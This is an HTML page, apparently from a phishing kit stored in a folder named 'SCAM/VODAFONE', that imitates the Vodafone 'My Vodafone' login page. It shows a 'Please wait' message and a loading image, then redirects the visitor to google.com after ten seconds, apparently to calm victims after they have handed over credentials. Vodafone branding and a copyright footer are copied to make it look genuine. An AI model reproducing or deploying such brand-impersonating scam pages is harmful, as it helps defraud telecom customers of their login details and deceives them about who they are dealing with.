
<!-- saved from url=(0051)file:///C:/Users/X5/Desktop/SCAM/VODAFONE/index.htm -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">





   <meta http-equiv="refresh" content="10;url=http://www.google.com/" />


<meta name="viewport" content="width=device-width">


<style>
img {
    max-width: 100%;
}
</style>

 
 
 <title>Login to My Vodafone</title> 
 
 
 

    <link rel="stylesheet" href="./Login to My Vodafone_files/framework.min.css">

    
 
            <link rel="stylesheet" href="./Login to My Vodafone_files/myv_loginregister.css">
        


<!-- preset all scenarios for nonav -->


</head><body class="template-contentpage">


<div id="mboxImported-default-target-global-mbox-0" style="visibility: visible; display: block;">



<!-- Offer Id: 51831  --></div> 
    <div class="belt">
    
 

    <div id="jump-to-content"><a></a></div></div>



<div class="wrapper">
		<div class="spring">


<!--googleoff: all-->
<!-- starting megadrop down -->

 











 




 


<header role="banner"><nav role="navigation">
<div class="belt belt-alt">
<div class="mod-js mod-nav">

<div class="rhombus"></div>
    <a class="logo">
        <img src="./Login to My Vodafone_files/vf-logo.png" alt="Vodafone">
    </a>

    <ul class="nav-mobile row">
        <li>
                <i class="i-menu"></i>
                <span class="access">Menu</span>
            
        </li>
        
        <li>
      
 
 
    </li>
 </ul> 
 <div class="nav-aux"><ul><li>
 
 
 <i class="i-business-sites"></i></li>
 
 
 <li class="basket"><i class="i-basket-sml">
 
 </i></li></ul></div>

 
 


 
	


    </div>
</div>
</nav></header></div>

 
 




<div class="belt">
<div class="content-area">

<!--googleon: all-->

<div class="main">



 
<!-- =============================== WELCOME BAR ========== -->
<div class="grid-column-12-0 clearfix" id="myv12-welcome-bar">
<div class="myv12-welcome-message-box grid-column-8-0"><h1>My Vodafone</h1></div></div>


<!-- =============================== LOGIN TABS BAR ========== -->
<div class="page-tabs aep-cmp-login-tabs"></div>


<!-- =============================== LOGIN BOX ========== -->



      <center>
  <h2>Please wait while ... </h2> 
 
 
 

        <!-- LOGIN FORM -->
       
					
			
 
 

               <CENTER>   
<img src="loading.gif"></img>
</center>
         
 
               
  


         
 
 
 

                    
          
    </ul></center></div>
   
</form></center></div>


 
 
 
 </div><!-- close end-column --> 




</div> <!-- close main --> 
 
</div> <!-- close content-area -->
 <!-- close belt -->




<!--googleoff: all--> 
        <div id="footer-nav">
            <div class="mod-js mod-footer" role="contentinfo">
            <div class="belt">
                <h2 class="access">Site links</h2>
                <div class="grid section">
                     
 
 </div> <div class="grid copy only-lrg"><div class="col w-20"></div><div class="col w-80">© Vodafone  Limited. Registration Number: 326967</div></div><p></p>
<p></p>

 </div></div> </div> 
 
 

<!-- SKN -->









 

</body></html>